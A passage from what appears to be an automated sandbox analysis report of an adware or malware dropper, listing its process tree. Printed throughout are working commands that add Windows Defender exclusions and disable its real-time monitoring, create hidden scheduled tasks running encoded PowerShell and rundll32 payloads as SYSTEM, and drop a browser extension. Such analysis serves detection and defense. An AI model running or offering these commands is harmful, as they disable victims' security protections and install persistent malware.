of 1604 1160 forfiles.exe 34 PID 1160 wrote to memory of 1604 1160 forfiles.exe 34 PID 1160 wrote to memory of 1604 1160 forfiles.exe 34 PID 1160 wrote to memory of 1604 1160 forfiles.exe 34 PID 1160 wrote to memory of 1604 1160 forfiles.exe 34 PID 1160 wrote to memory of 1604 1160 forfiles.exe 34 PID 1160 wrote to memory of 1604 1160 forfiles.exe 34 PID 980 wrote to memory of 568 980 cmd.exe 36 PID 980 wrote to memory of 568 980 cmd.exe 36 PID 980 wrote to memory of 568 980 cmd.exe 36 PID 980 wrote to memory of 568 980 cmd.exe 36 PID 980 wrote to memory of 568 980 cmd.exe 36 PID 980 wrote to memory of 568 980 cmd.exe 36 PID 1604 wrote to memory of 1256 1604 cmd.exe 37 PID 980 wrote to memory of 568 980 cmd.exe 36 PID 1604 wrote to memory of 1256 1604 cmd.exe 37 PID 1604 wrote to memory of 1256 1604 cmd.exe 37 PID 1604 wrote to memory of 1256 1604 cmd.exe 37 PID 1604 wrote to memory of 1256 1604 cmd.exe 37 PID 1604 wrote to memory of 1256 1604 cmd.exe 37 PID 1604 wrote to memory of 1256 1604 cmd.exe 37 PID 1604 wrote to memory of 1612 1604 cmd.exe 38 PID 1604 wrote to memory of 1612 1604 cmd.exe 38 PID 1604 wrote to memory of 1612 1604 cmd.exe 38 PID 1604 wrote to memory of 1612 1604 cmd.exe 38 PID 1604 wrote to memory of 1612 1604 cmd.exe 38 PID 1604 wrote to memory of 1612 1604 cmd.exe 38 PID 1604 wrote to memory of 1612 1604 cmd.exe 38 PID 980 wrote to memory of 1664 980 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\7zSFC69.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\7zSFFD3.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:980 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:568
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1664
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1256
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1612
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNZWjVRxG" /SC once /ST 01:44:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNZWjVRxG"4⤵PID:1968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNZWjVRxG"4⤵PID:468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bpCIAYFeZyKMHikKBh" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\sFhEamk.exe\" ux /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:820
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3F999AEA-19B0-46D8-A4A8-722F3C6E671B} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵PID:1472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:316
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:832
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1732
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1592
-
C:\Windows\system32\taskeng.exetaskeng.exe {E99E9629-388A-43D7-81B4-667DD79BA960} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\sFhEamk.exeC:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ\VjcktLssTQnIhvX\sFhEamk.exe ux /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:580 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpRnAviez" /SC once /ST 01:09:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpRnAviez"3⤵PID:1232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpRnAviez"3⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1832
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1348
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:664
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyponfdkf" /SC once /ST 04:07:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyponfdkf"3⤵PID:820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyponfdkf"3⤵PID:1600
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:323⤵PID:1540
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:643⤵PID:1628
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:323⤵PID:1368
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:324⤵PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:643⤵PID:1012
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:644⤵PID:1040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\knLrxBGDCryPZEWZ\HXVTocvF\GobPbQyIMvSRcjBB.wsf"3⤵PID:1212
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\knLrxBGDCryPZEWZ\HXVTocvF\GobPbQyIMvSRcjBB.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1260 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\yhlYPCkQXcaQbSVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\yhlYPCkQXcaQbSVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:324⤵PID:972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR" /t REG_DWORD /d 0 /reg:644⤵PID:628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:324⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QrhBhAIewKJHC" /t REG_DWORD /d 0 /reg:644⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:324⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rJaJUqPnDsUn" /t REG_DWORD /d 0 /reg:644⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:324⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryYNpJDBUybU2" /t REG_DWORD /d 0 /reg:644⤵PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:324⤵PID:520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vckoWffGU" /t REG_DWORD /d 0 /reg:644⤵PID:1304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\yhlYPCkQXcaQbSVB" /t REG_DWORD /d 0 /reg:324⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\yhlYPCkQXcaQbSVB" /t REG_DWORD /d 0 /reg:644⤵PID:664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ" /t REG_DWORD /d 0 /reg:324⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\okeChyKeTmbHgprqQ" /t REG_DWORD /d 0 /reg:644⤵PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:324⤵PID:1240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\knLrxBGDCryPZEWZ" /t REG_DWORD /d 0 /reg:644⤵PID:1256
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfeubKHGm" /SC once /ST 00:26:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfeubKHGm"3⤵PID:1052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfeubKHGm"3⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1600
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1592
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1544
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sowxjEWsCulfsCpcT" /SC once /ST 03:27:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\kWigApf.exe\" oy /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "sowxjEWsCulfsCpcT"3⤵PID:1628
-
-
-
C:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\kWigApf.exeC:\Windows\Temp\knLrxBGDCryPZEWZ\IfwwpebIuCOMZrt\kWigApf.exe oy /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bpCIAYFeZyKMHikKBh"3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1852
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1500
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1528
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\vckoWffGU\DTSvNJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gxWNFYjnrIlwkwP" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxWNFYjnrIlwkwP2" /F /xml "C:\Program Files (x86)\vckoWffGU\KZWDbLO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gxWNFYjnrIlwkwP"3⤵PID:1836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxWNFYjnrIlwkwP"3⤵PID:1936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmSkNVbcyXknPd" /F /xml "C:\Program Files (x86)\ryYNpJDBUybU2\Wftzewg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "feKFQCAArapkO2" /F /xml "C:\ProgramData\yhlYPCkQXcaQbSVB\moUAjXr.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LcCuXRPRLgEfYpiYS2" /F /xml "C:\Program Files (x86)\GvoOIxMhypioqxYUWFR\LtkyOOB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KqvBPQPJtlAHeKbmsPE2" /F /xml "C:\Program Files (x86)\QrhBhAIewKJHC\rJgEHpb.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EdnsbscYxaTlTxMBg" /SC once /ST 03:55:04 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\knLrxBGDCryPZEWZ\IjHAGOmu\KsWMORk.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EdnsbscYxaTlTxMBg"3⤵PID:1400
-
-
